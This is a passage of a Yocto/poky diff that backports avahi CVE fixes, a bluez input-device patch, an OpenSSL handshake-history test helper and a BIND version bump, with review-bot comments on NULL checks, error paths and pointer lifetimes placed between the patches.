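Review bot: in the second `server.c` hunk `hn` is handed to `avahi_unescape_label()` without a NULL check, although `avahi_normalize_name_strdup()` can return NULL (the test added in CVE-2023-38470-1 asserts exactly that). The new failure paths also return bare `AVAHI_ERR_INVALID_HOST_NAME` and `AVAHI_ERR_NO_MEMORY`, while the neighbouring `AVAHI_ERR_NO_CHANGE` path goes through `avahi_server_set_errno()`. Both gaps are closed by CVE-2023-38471-2, so this patch must never be applied without its follow-up; a line in the header saying so would prevent someone from cherry-picking it alone.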
diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch
new file mode 100644
index 0000000000..44737bfc2e
--- /dev/null
+++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch
@@ -0,0 +1,52 @@
+From b675f70739f404342f7f78635d6e2dcd85a13460 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Tue, 24 Oct 2023 22:04:51 +0000
+Subject: [PATCH] core: return errors from avahi_server_set_host_name properly
+
+It's a follow-up to 894f085f402e023a98cbb6f5a3d117bd88d93b09
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-2.patch?h=ubuntu/jammy-security
+Upstream commit https://github.com/lathiat/avahi/commit/b675f70739f404342f7f78635d6e2dcd85a13460]
+CVE: CVE-2023-38471 #Follow-up Patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/server.c | 9 ++++++---
+ 1 file changed, 6 insertions(+), 3 deletions(-)
+
+Index: avahi-0.8/avahi-core/server.c
+===================================================================
+--- avahi-0.8.orig/avahi-core/server.c
++++ avahi-0.8/avahi-core/server.c
+@@ -1309,10 +1309,13 @@ int avahi_server_set_host_name(AvahiServ
+ else
+ hn = avahi_normalize_name_strdup(host_name);
+
++ if (!hn)
++ return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);
++
+ h = hn;
+ if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) {
+ avahi_free(h);
+- return AVAHI_ERR_INVALID_HOST_NAME;
++ return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME);
+ }
+
+ avahi_free(h);
+@@ -1320,7 +1323,7 @@ int avahi_server_set_host_name(AvahiServ
+ h = label_escaped;
+ len = sizeof(label_escaped);
+ if (!avahi_escape_label(label, strlen(label), &h, &len))
+- return AVAHI_ERR_INVALID_HOST_NAME;
++ return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME);
+
+ if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION)
+ return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE);
+@@ -1330,7 +1333,7 @@ int avahi_server_set_host_name(AvahiServ
+ avahi_free(s->host_name);
+ s->host_name = avahi_strdup(label_escaped);
+ if (!s->host_name)
+- return AVAHI_ERR_NO_MEMORY;
++ return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);
+
+ update_fqdn(s);
+
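Review bot: in the last hunk `s->host_name` is freed before `avahi_strdup(label_escaped)` is known to have succeeded, so the `AVAHI_ERR_NO_MEMORY` return leaves the server holding a NULL host name. Duplicate into a temporary first, and only free and swap once the copy exists. Separately, the new `if (!hn)` branch in the first hunk always reports `AVAHI_ERR_NO_MEMORY`, but the CVE-2023-38470-1 test shows `avahi_normalize_name_strdup()` also returns NULL for names it rejects, so the code can mislabel an invalid name as an allocation failure.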
diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch
new file mode 100644
index 0000000000..5c63edb31f
--- /dev/null
+++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch
@@ -0,0 +1,45 @@
+From b024ae5749f4aeba03478e6391687c3c9c8dee40 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Thu, 19 Oct 2023 17:36:44 +0200
+Subject: [PATCH] core: make sure there is rdata to process before parsing it
+
+Fixes #452
+
+CVE-2023-38472
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38472.patch?h=ubuntu/jammy-security
+Upstream commit https://github.com/lathiat/avahi/commit/b024ae5749f4aeba03478e6391687c3c9c8dee40]
+CVE: CVE-2023-38472
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-client/client-test.c | 3 +++
+ avahi-daemon/dbus-entry-group.c | 2 +-
+ 2 files changed, 4 insertions(+), 1 deletion(-)
+
+Index: avahi-0.8/avahi-client/client-test.c
+===================================================================
+--- avahi-0.8.orig/avahi-client/client-test.c
++++ avahi-0.8/avahi-client/client-test.c
+@@ -272,6 +272,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+ assert(error == AVAHI_ERR_INVALID_RECORD);
+ avahi_string_list_free(txt);
+
++ error = avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "", 0);
++ assert(error != AVAHI_OK);
++
+ avahi_entry_group_commit (group);
+
+ domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u");
+Index: avahi-0.8/avahi-daemon/dbus-entry-group.c
+===================================================================
+--- avahi-0.8.orig/avahi-daemon/dbus-entry-group.c
++++ avahi-0.8/avahi-daemon/dbus-entry-group.c
+@@ -340,7 +340,7 @@ DBusHandlerResult avahi_dbus_msg_entry_g
+ if (!(r = avahi_record_new_full (name, clazz, type, ttl)))
+ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NO_MEMORY, NULL);
+
+- if (avahi_rdata_parse (r, rdata, size) < 0) {
++ if (!rdata || avahi_rdata_parse (r, rdata, size) < 0) {
+ avahi_record_unref (r);
+ return avahi_dbus_respond_error(c, m, AVAHI_ERR_INVALID_RDATA, NULL);
+ }
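Review bot: the guard added in `dbus-entry-group.c` tests only the `rdata` pointer and not `size`, while the commit subject and the new test (an empty string with length 0) are about there being no rdata to process. If a zero-length array can arrive with a non-NULL pointer, `avahi_rdata_parse()` is still called with `size` 0. Please either add a comment explaining why the pointer check is sufficient or extend the condition. The new test assertion `error != AVAHI_OK` is also loose; asserting the expected error code would pin the behaviour down.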
diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch
new file mode 100644
index 0000000000..d7c69225b1
--- /dev/null
+++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch
@@ -0,0 +1,109 @@
+From b448c9f771bada14ae8de175695a9729f8646797 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Wed, 11 Oct 2023 17:45:44 +0200
+Subject: [PATCH] common: derive alternative host name from its unescaped
+ version
+
+Normalization of input makes sure we don't have to deal with special
+cases like unescaped dot at the end of label.
+
+Fixes #451 #487
+CVE-2023-38473
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38473.patch?h=ubuntu/jammy-security
+Upstream commit https://github.com/lathiat/avahi/commit/b448c9f771bada14ae8de175695a9729f8646797]
+CVE: CVE-2023-38473
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/alternative-test.c | 3 +++
+ avahi-common/alternative.c | 27 +++++++++++++++++++--------
+ 2 files changed, 22 insertions(+), 8 deletions(-)
+
+Index: avahi-0.8/avahi-common/alternative-test.c
+===================================================================
+--- avahi-0.8.orig/avahi-common/alternative-test.c
++++ avahi-0.8/avahi-common/alternative-test.c
+@@ -31,6 +31,9 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH
+ const char* const test_strings[] = {
+ "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
+ "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXüüüüüüü",
++ ").",
++ "\\.",
++ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\\",
+ "gurke",
+ "-",
+ " #",
+Index: avahi-0.8/avahi-common/alternative.c
+===================================================================
+--- avahi-0.8.orig/avahi-common/alternative.c
++++ avahi-0.8/avahi-common/alternative.c
+@@ -49,15 +49,20 @@ static void drop_incomplete_utf8(char *c
+ }
+
+ char *avahi_alternative_host_name(const char *s) {
++ char label[AVAHI_LABEL_MAX], alternative[AVAHI_LABEL_MAX*4+1];
++ char *alt, *r, *ret;
+ const char *e;
+- char *r;
++ size_t len;
+
+ assert(s);
+
+ if (!avahi_is_valid_host_name(s))
+ return NULL;
+
+- if ((e = strrchr(s, '-'))) {
++ if (!avahi_unescape_label(&s, label, sizeof(label)))
++ return NULL;
++
++ if ((e = strrchr(label, '-'))) {
+ const char *p;
+
+ e++;
+@@ -74,19 +79,18 @@ char *avahi_alternative_host_name(const
+
+ if (e) {
+ char *c, *m;
+- size_t l;
+ int n;
+
+ n = atoi(e)+1;
+ if (!(m = avahi_strdup_printf("%i", n)))
+ return NULL;
+
+- l = e-s-1;
++ len = e-label-1;
+
+- if (l >= AVAHI_LABEL_MAX-1-strlen(m)-1)
+- l = AVAHI_LABEL_MAX-1-strlen(m)-1;
++ if (len >= AVAHI_LABEL_MAX-1-strlen(m)-1)
++ len = AVAHI_LABEL_MAX-1-strlen(m)-1;
+
+- if (!(c = avahi_strndup(s, l))) {
++ if (!(c = avahi_strndup(label, len))) {
+ avahi_free(m);
+ return NULL;
+ }
+@@ -100,7 +104,7 @@ char *avahi_alternative_host_name(const
+ } else {
+ char *c;
+
+- if (!(c = avahi_strndup(s, AVAHI_LABEL_MAX-1-2)))
++ if (!(c = avahi_strndup(label, AVAHI_LABEL_MAX-1-2)))
+ return NULL;
+
+ drop_incomplete_utf8(c);
+@@ -109,6 +113,13 @@ char *avahi_alternative_host_name(const
+ avahi_free(c);
+ }
+
++ alt = alternative;
++ len = sizeof(alternative);
++ ret = avahi_escape_label(r, strlen(r), &alt, &len);
++
++ avahi_free(r);
++ r = avahi_strdup(ret);
++
+ assert(avahi_is_valid_host_name(r));
+
+ return r;
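Review bot: in the final `alternative.c` hunk the result of `avahi_escape_label()` is stored in `ret` and passed straight to `avahi_strdup()`, and the duplicate then goes into `assert(avahi_is_valid_host_name(r))`, with neither value checked for NULL. The other `avahi_escape_label()` callers touched in this series (CVE-2023-38470-2, CVE-2023-38471-1) bail out on failure. Do the same here and return NULL if escaping or duplication fails, rather than relying on the assert.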
diff --git a/poky/meta/recipes-connectivity/bind/bind_9.18.19.bb b/poky/meta/recipes-connectivity/bind/bind_9.18.20.bb
index 8124c5c591..187685eef5 100644
--- a/poky/meta/recipes-connectivity/bind/bind_9.18.19.bb
+++ b/poky/meta/recipes-connectivity/bind/bind_9.18.20.bb
@@ -20,7 +20,7 @@ SRC_URI = "https://ftp.isc.org/isc/bind9/${PV}/${BPN}-${PV}.tar.xz \
file://0001-avoid-start-failure-with-bind-user.patch \
"
-SRC_URI[sha256sum] = "115e09c05439bebade1d272eda08fa88eb3b60129edef690588c87a4d27612cc"
+SRC_URI[sha256sum] = "4b891ebf58d3f2a7ac3dd2682990f528a3448eaa1c992ddc5c141b8587a98ec5"
UPSTREAM_CHECK_URI = "https://ftp.isc.org/isc/bind9/"
# follow the ESV versions divisible by 2
diff --git a/poky/meta/recipes-connectivity/bluez5/bluez5.inc b/poky/meta/recipes-connectivity/bluez5/bluez5.inc
index e10158a6e5..a23e4e58a6 100644
--- a/poky/meta/recipes-connectivity/bluez5/bluez5.inc
+++ b/poky/meta/recipes-connectivity/bluez5/bluez5.inc
@@ -55,6 +55,7 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/bluetooth/bluez-${PV}.tar.xz \
file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \
file://0001-test-gatt-Fix-hung-issue.patch \
file://0004-src-shared-util.c-include-linux-limits.h.patch \
+ file://0002-input-Fix-.device_probe-failing-if-SDP-record-is-not.patch \
"
S = "${WORKDIR}/bluez-${PV}"
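Review bot: the new `0002-input-Fix-.device_probe-failing-if-SDP-record-is-not.patch` entry is appended after `0004-src-shared-util.c-include-linux-limits.h.patch` in `SRC_URI`, so the numeric prefixes no longer match the order in which the patches are listed. The `0002` appears to come from the upstream `[PATCH 02/40]` numbering. Renaming the file to the next free local number, or dropping the prefix, would avoid confusion.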
diff --git a/poky/meta/recipes-connectivity/bluez5/bluez5/0002-input-Fix-.device_probe-failing-if-SDP-record-is-not.patch b/poky/meta/recipes-connectivity/bluez5/bluez5/0002-input-Fix-.device_probe-failing-if-SDP-record-is-not.patch
new file mode 100644
index 0000000000..d0884338db
--- /dev/null
+++ b/poky/meta/recipes-connectivity/bluez5/bluez5/0002-input-Fix-.device_probe-failing-if-SDP-record-is-not.patch
@@ -0,0 +1,313 @@
+From 3a9c637010f8dc1ba3e8382abe01065761d4f5bb Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 10 Oct 2023 12:38:29 -0700
+Subject: [PATCH 02/40] input: Fix .device_probe failing if SDP record is not
+ found
+
+Due to changes introduced by 67a26abe53bf
+("profile: Add probe_on_discover flag") profiles may get probed when
+their profile UUID are discovered, rather than resolved, which means
+the SDP record may not be available.
+
+Fixes: https://github.com/bluez/bluez/issues/614
+
+Upstream-Status: Backport [https://github.com/bluez/bluez/commit/3a9c637010f8dc1ba3e8382abe01065761d4f5bb]
+---
+ profiles/input/device.c | 182 +++++++++++++++++++---------------------
+ 1 file changed, 84 insertions(+), 98 deletions(-)
+
+diff --git a/profiles/input/device.c b/profiles/input/device.c
+index e2ac6ea60..4a50ea992 100644
+--- a/profiles/input/device.c
++++ b/profiles/input/device.c
+@@ -60,7 +60,7 @@ struct input_device {
+ char *path;
+ bdaddr_t src;
+ bdaddr_t dst;
+- uint32_t handle;
++ const sdp_record_t *rec;
+ GIOChannel *ctrl_io;
+ GIOChannel *intr_io;
+ guint ctrl_watch;
+@@ -754,7 +754,8 @@ static void epox_endian_quirk(unsigned char *data, int size)
+ }
+ }
+
+-static int create_hid_dev_name(sdp_record_t *rec, struct hidp_connadd_req *req)
++static int create_hid_dev_name(const sdp_record_t *rec,
++ struct hidp_connadd_req *req)
+ {
+ char sdesc[sizeof(req->name) / 2];
+
+@@ -776,7 +777,7 @@ static int create_hid_dev_name(sdp_record_t *rec, struct hidp_connadd_req *req)
+
+ /* See HID profile specification v1.0, "7.11.6 HIDDescriptorList" for details
+ * on the attribute format. */
+-static int extract_hid_desc_data(sdp_record_t *rec,
++static int extract_hid_desc_data(const sdp_record_t *rec,
+ struct hidp_connadd_req *req)
+ {
+ sdp_data_t *d;
+@@ -817,36 +818,40 @@ invalid_desc:
+ return -EINVAL;
+ }
+
+-static int extract_hid_record(sdp_record_t *rec, struct hidp_connadd_req *req)
++static int extract_hid_record(struct input_device *idev,
++ struct hidp_connadd_req *req)
+ {
+ sdp_data_t *pdlist;
+ uint8_t attr_val;
+ int err;
+
+- err = create_hid_dev_name(rec, req);
++ if (!idev->rec)
++ return -ENOENT;
++
++ err = create_hid_dev_name(idev->rec, req);
+ if (err < 0)
+ DBG("No valid Service Name or Service Description found");
+
+- pdlist = sdp_data_get(rec, SDP_ATTR_HID_PARSER_VERSION);
++ pdlist = sdp_data_get(idev->rec, SDP_ATTR_HID_PARSER_VERSION);
+ req->parser = pdlist ? pdlist->val.uint16 : 0x0100;
+
+- pdlist = sdp_data_get(rec, SDP_ATTR_HID_DEVICE_SUBCLASS);
++ pdlist = sdp_data_get(idev->rec, SDP_ATTR_HID_DEVICE_SUBCLASS);
+ req->subclass = pdlist ? pdlist->val.uint8 : 0;
+
+- pdlist = sdp_data_get(rec, SDP_ATTR_HID_COUNTRY_CODE);
++ pdlist = sdp_data_get(idev->rec, SDP_ATTR_HID_COUNTRY_CODE);
+ req->country = pdlist ? pdlist->val.uint8 : 0;
+
+- pdlist = sdp_data_get(rec, SDP_ATTR_HID_VIRTUAL_CABLE);
++ pdlist = sdp_data_get(idev->rec, SDP_ATTR_HID_VIRTUAL_CABLE);
+ attr_val = pdlist ? pdlist->val.uint8 : 0;
+ if (attr_val)
+ req->flags |= (1 << HIDP_VIRTUAL_CABLE_UNPLUG);
+
+- pdlist = sdp_data_get(rec, SDP_ATTR_HID_BOOT_DEVICE);
++ pdlist = sdp_data_get(idev->rec, SDP_ATTR_HID_BOOT_DEVICE);
+ attr_val = pdlist ? pdlist->val.uint8 : 0;
+ if (attr_val)
+ req->flags |= (1 << HIDP_BOOT_PROTOCOL_MODE);
+
+- err = extract_hid_desc_data(rec, req);
++ err = extract_hid_desc_data(idev->rec, req);
+ if (err < 0)
+ return err;
+
+@@ -1035,11 +1040,6 @@ static gboolean encrypt_notify(GIOChannel *io, GIOCondition condition,
+ static int hidp_add_connection(struct input_device *idev)
+ {
+ struct hidp_connadd_req *req;
+- sdp_record_t *rec;
+- char src_addr[18], dst_addr[18];
+- char filename[PATH_MAX];
+- GKeyFile *key_file;
+- char handle[11], *str;
+ GError *gerr = NULL;
+ int err;
+
+@@ -1049,33 +1049,7 @@ static int hidp_add_connection(struct input_device *idev)
+ req->flags = 0;
+ req->idle_to = idle_timeout;
+
+- ba2str(&idev->src, src_addr);
+- ba2str(&idev->dst, dst_addr);
+-
+- snprintf(filename, PATH_MAX, STORAGEDIR "/%s/cache/%s", src_addr,
+- dst_addr);
+- sprintf(handle, "0x%8.8X", idev->handle);
+-
+- key_file = g_key_file_new();
+- if (!g_key_file_load_from_file(key_file, filename, 0, &gerr)) {
+- error("Unable to load key file from %s: (%s)", filename,
+- gerr->message);
+- g_clear_error(&gerr);
+- }
+- str = g_key_file_get_string(key_file, "ServiceRecords", handle, NULL);
+- g_key_file_free(key_file);
+-
+- if (!str) {
+- error("Rejected connection from unknown device %s", dst_addr);
+- err = -EPERM;
+- goto cleanup;
+- }
+-
+- rec = record_from_string(str);
+- g_free(str);
+-
+- err = extract_hid_record(rec, req);
+- sdp_record_free(rec);
++ err = extract_hid_record(idev, req);
+ if (err < 0) {
+ error("Could not parse HID SDP record: %s (%d)", strerror(-err),
+ -err);
+@@ -1091,7 +1065,7 @@ static int hidp_add_connection(struct input_device *idev)
+
+ /* Make sure the device is bonded if required */
+ if (classic_bonded_only && !input_device_bonded(idev)) {
+- error("Rejected connection from !bonded device %s", dst_addr);
++ error("Rejected connection from !bonded device %s", idev->path);
+ goto cleanup;
+ }
+
+@@ -1161,6 +1135,68 @@ static int connection_disconnect(struct input_device *idev, uint32_t flags)
+ return ioctl_disconnect(idev, flags);
+ }
+
++static bool is_device_sdp_disable(const sdp_record_t *rec)
++{
++ sdp_data_t *data;
++
++ data = sdp_data_get(rec, SDP_ATTR_HID_SDP_DISABLE);
++
++ return data && data->val.uint8;
++}
++
++static enum reconnect_mode_t hid_reconnection_mode(bool reconnect_initiate,
++ bool normally_connectable)
++{
++ if (!reconnect_initiate && !normally_connectable)
++ return RECONNECT_NONE;
++ else if (!reconnect_initiate && normally_connectable)
++ return RECONNECT_HOST;
++ else if (reconnect_initiate && !normally_connectable)
++ return RECONNECT_DEVICE;
++ else /* (reconnect_initiate && normally_connectable) */
++ return RECONNECT_ANY;
++}
++
++static void extract_hid_props(struct input_device *idev,
++ const sdp_record_t *rec)
++{
++ /* Extract HID connectability */
++ bool reconnect_initiate, normally_connectable;
++ sdp_data_t *pdlist;
++
++ /* HIDNormallyConnectable is optional and assumed FALSE if not
++ * present.
++ */
++ pdlist = sdp_data_get(rec, SDP_ATTR_HID_RECONNECT_INITIATE);
++ reconnect_initiate = pdlist ? pdlist->val.uint8 : TRUE;
++
++ pdlist = sdp_data_get(rec, SDP_ATTR_HID_NORMALLY_CONNECTABLE);
++ normally_connectable = pdlist ? pdlist->val.uint8 : FALSE;
++
++ /* Update local values */
++ idev->reconnect_mode =
++ hid_reconnection_mode(reconnect_initiate, normally_connectable);
++}
++
++static void input_device_update_rec(struct input_device *idev)
++{
++ struct btd_profile *p = btd_service_get_profile(idev->service);
++ const sdp_record_t *rec;
++
++ rec = btd_device_get_record(idev->device, p->remote_uuid);
++ if (!rec || idev->rec == rec)
++ return;
++
++ idev->rec = rec;
++ idev->disable_sdp = is_device_sdp_disable(rec);
++
++ /* Initialize device properties */
++ extract_hid_props(idev, rec);
++
++ if (idev->disable_sdp)
++ device_set_refresh_discovery(idev->device, false);
++}
++
+ static int input_device_connected(struct input_device *idev)
+ {
+ int err;
+@@ -1168,6 +1204,9 @@ static int input_device_connected(struct input_device *idev)
+ if (idev->intr_io == NULL || idev->ctrl_io == NULL)
+ return -ENOTCONN;
+
++ /* Attempt to update SDP record if it had changed */
++ input_device_update_rec(idev);
++
+ err = hidp_add_connection(idev);
+ if (err < 0)
+ return err;
+@@ -1411,74 +1450,21 @@ int input_device_disconnect(struct btd_service *service)
+ return 0;
+ }
+
+-static bool is_device_sdp_disable(const sdp_record_t *rec)
+-{
+- sdp_data_t *data;
+-
+- data = sdp_data_get(rec, SDP_ATTR_HID_SDP_DISABLE);
+-
+- return data && data->val.uint8;
+-}
+-
+-static enum reconnect_mode_t hid_reconnection_mode(bool reconnect_initiate,
+- bool normally_connectable)
+-{
+- if (!reconnect_initiate && !normally_connectable)
+- return RECONNECT_NONE;
+- else if (!reconnect_initiate && normally_connectable)
+- return RECONNECT_HOST;
+- else if (reconnect_initiate && !normally_connectable)
+- return RECONNECT_DEVICE;
+- else /* (reconnect_initiate && normally_connectable) */
+- return RECONNECT_ANY;
+-}
+-
+-static void extract_hid_props(struct input_device *idev,
+- const sdp_record_t *rec)
+-{
+- /* Extract HID connectability */
+- bool reconnect_initiate, normally_connectable;
+- sdp_data_t *pdlist;
+-
+- /* HIDNormallyConnectable is optional and assumed FALSE
+- * if not present. */
+- pdlist = sdp_data_get(rec, SDP_ATTR_HID_RECONNECT_INITIATE);
+- reconnect_initiate = pdlist ? pdlist->val.uint8 : TRUE;
+-
+- pdlist = sdp_data_get(rec, SDP_ATTR_HID_NORMALLY_CONNECTABLE);
+- normally_connectable = pdlist ? pdlist->val.uint8 : FALSE;
+-
+- /* Update local values */
+- idev->reconnect_mode =
+- hid_reconnection_mode(reconnect_initiate, normally_connectable);
+-}
+-
+ static struct input_device *input_device_new(struct btd_service *service)
+ {
+ struct btd_device *device = btd_service_get_device(service);
+- struct btd_profile *p = btd_service_get_profile(service);
+ const char *path = device_get_path(device);
+- const sdp_record_t *rec = btd_device_get_record(device, p->remote_uuid);
+ struct btd_adapter *adapter = device_get_adapter(device);
+ struct input_device *idev;
+
+- if (!rec)
+- return NULL;
+-
+ idev = g_new0(struct input_device, 1);
+ bacpy(&idev->src, btd_adapter_get_address(adapter));
+ bacpy(&idev->dst, device_get_address(device));
+ idev->service = btd_service_ref(service);
+ idev->device = btd_device_ref(device);
+ idev->path = g_strdup(path);
+- idev->handle = rec->handle;
+- idev->disable_sdp = is_device_sdp_disable(rec);
+-
+- /* Initialize device properties */
+- extract_hid_props(idev, rec);
+
+- if (idev->disable_sdp)
+- device_set_refresh_discovery(device, false);
++ input_device_update_rec(idev);
+
+ return idev;
+ }
+--
+2.42.0
+
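Review bot: `input_device_update_rec()` returns early when `btd_device_get_record()` yields NULL (`if (!rec || idev->rec == rec) return;`), which leaves any previously cached `idev->rec` in place. The pointer is borrowed, not owned, so `extract_hid_record()` may later dereference a record that no longer exists. Clear `idev->rec` when the lookup fails, or document the lifetime guarantee that makes the cached pointer safe. Two smaller points: the comment kept above the `SDP_ATTR_HID_RECONNECT_INITIATE` lookup in `extract_hid_props()` still talks about HIDNormallyConnectable, and the patch header has no Signed-off-by line from the importer, unlike the avahi patches in this update.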
diff --git a/poky/meta/recipes-connectivity/openssl/openssl/0001-Added-handshake-history-reporting-when-test-fails.patch b/poky/meta/recipes-connectivity/openssl/openssl/0001-Added-handshake-history-reporting-when-test-fails.patch
new file mode 100644
index 0000000000..aa2e5bb800
--- /dev/null
+++ b/poky/meta/recipes-connectivity/openssl/openssl/0001-Added-handshake-history-reporting-when-test-fails.patch
@@ -0,0 +1,374 @@
+From 5ba65051fea0513db0d997f0ab7cafb9826ed74a Mon Sep 17 00:00:00 2001
+From: William Lyu <William.Lyu@windriver.com>
+Date: Fri, 20 Oct 2023 16:22:37 -0400
+Subject: [PATCH] Added handshake history reporting when test fails
+
+Upstream-Status: Submitted [https://github.com/openssl/openssl/pull/22481]
+
+Signed-off-by: William Lyu <William.Lyu@windriver.com>
+---
+ test/helpers/handshake.c | 139 +++++++++++++++++++++++++++++----------
+ test/helpers/handshake.h | 70 +++++++++++++++++++-
+ test/ssl_test.c | 44 +++++++++++++
+ 3 files changed, 218 insertions(+), 35 deletions(-)
+
+diff --git a/test/helpers/handshake.c b/test/helpers/handshake.c
+index e0422469e4..ae2ad59dd4 100644
+--- a/test/helpers/handshake.c
++++ b/test/helpers/handshake.c
+@@ -1,5 +1,5 @@
+ /*
+- * Copyright 2016-2022 The OpenSSL Project Authors. All Rights Reserved.
++ * Copyright 2016-2023 The OpenSSL Project Authors. All Rights Reserved.
+ *
+ * Licensed under the Apache License 2.0 (the "License"). You may not use
+ * this file except in compliance with the License. You can obtain a copy
+@@ -24,6 +24,102 @@
+ #include <netinet/sctp.h>
+ #endif
+
++/* Shamelessly copied from test/helpers/ssl_test_ctx.c */
++/* Maps string names to various enumeration type */
++typedef struct {
++ const char *name;
++ int value;
++} enum_name_map;
++
++static const enum_name_map connect_phase_names[] = {
++ {"Handshake", HANDSHAKE},
++ {"RenegAppData", RENEG_APPLICATION_DATA},
++ {"RenegSetup", RENEG_SETUP},
++ {"RenegHandshake", RENEG_HANDSHAKE},
++ {"AppData", APPLICATION_DATA},
++ {"Shutdown", SHUTDOWN},
++ {"ConnectionDone", CONNECTION_DONE}
++};
++
++static const enum_name_map peer_status_names[] = {
++ {"PeerSuccess", PEER_SUCCESS},
++ {"PeerRetry", PEER_RETRY},
++ {"PeerError", PEER_ERROR},
++ {"PeerWaiting", PEER_WAITING},
++ {"PeerTestFail", PEER_TEST_FAILURE}
++};
++
++static const enum_name_map handshake_status_names[] = {
++ {"HandshakeSuccess", HANDSHAKE_SUCCESS},
++ {"ClientError", CLIENT_ERROR},
++ {"ServerError", SERVER_ERROR},
++ {"InternalError", INTERNAL_ERROR},
++ {"HandshakeRetry", HANDSHAKE_RETRY}
++};
++
++/* Shamelessly copied from test/helpers/ssl_test_ctx.c */
++static const char *enum_name(const enum_name_map *enums, size_t num_enums,
++ int value)
++{
++ size_t i;
++ for (i = 0; i < num_enums; i++) {
++ if (enums[i].value == value) {
++ return enums[i].name;
++ }
++ }
++ return "InvalidValue";
++}
++
++const char *handshake_connect_phase_name(connect_phase_t phase)
++{
++ return enum_name(connect_phase_names, OSSL_NELEM(connect_phase_names),
++ (int)phase);
++}
++
++const char *handshake_status_name(handshake_status_t handshake_status)
++{
++ return enum_name(handshake_status_names, OSSL_NELEM(handshake_status_names),
++ (int)handshake_status);
++}
++
++const char *handshake_peer_status_name(peer_status_t peer_status)
++{
++ return enum_name(peer_status_names, OSSL_NELEM(peer_status_names),
++ (int)peer_status);
++}
++
++static void save_loop_history(HANDSHAKE_HISTORY *history,
++ connect_phase_t phase,
++ handshake_status_t handshake_status,
++ peer_status_t server_status,
++ peer_status_t client_status,
++ int client_turn_count,
++ int is_client_turn)
++{
++ HANDSHAKE_HISTORY_ENTRY *new_entry = NULL;
++
++ /*
++ * Create a new history entry for a handshake loop with statuses given in
++ * the arguments. Potentially evicting the oldest entry when the
++ * ring buffer is full.
++ */
++ ++(history->last_idx);
++ history->last_idx &= MAX_HANDSHAKE_HISTORY_ENTRY_IDX_MASK;
++
++ new_entry = &((history->entries)[history->last_idx]);
++ new_entry->phase = phase;
++ new_entry->handshake_status = handshake_status;
++ new_entry->server_status = server_status;
++ new_entry->client_status = client_status;
++ new_entry->client_turn_count = client_turn_count;
++ new_entry->is_client_turn = is_client_turn;
++
++ /* Evict the oldest handshake loop entry when the ring buffer is full. */
++ if (history->entry_count < MAX_HANDSHAKE_HISTORY_ENTRY) {
++ ++(history->entry_count);
++ }
++}
++
+ HANDSHAKE_RESULT *HANDSHAKE_RESULT_new(void)
+ {
+ HANDSHAKE_RESULT *ret;
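Review bot: In save_loop_history() the comment "Evict the oldest handshake loop entry when the ring buffer is full" sits above code that only increments entry_count while the buffer is not yet full. The eviction actually happens implicitly a few lines earlier, when the masked last_idx wraps and the old slot is overwritten. Please reword the comment to say what the branch does. The function also pre-increments last_idx before the first write, so it relies on the HANDSHAKE_HISTORY starting out zeroed. A one-line comment stating that assumption would help. Finally, enum_name_map and enum_name() are marked as copied from test/helpers/ssl_test_ctx.c; exporting the existing helper would avoid keeping two copies in sync.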
+@@ -719,15 +815,6 @@ static void configure_handshake_ssl(SSL *server, SSL *client,
+ SSL_set_post_handshake_auth(client, 1);
+ }
+
+-/* The status for each connection phase. */
+-typedef enum {
+- PEER_SUCCESS,
+- PEER_RETRY,
+- PEER_ERROR,
+- PEER_WAITING,
+- PEER_TEST_FAILURE
+-} peer_status_t;
+-
+ /* An SSL object and associated read-write buffers. */
+ typedef struct peer_st {
+ SSL *ssl;
+@@ -1074,17 +1161,6 @@ static void do_shutdown_step(PEER *peer)
+ }
+ }
+
+-typedef enum {
+- HANDSHAKE,
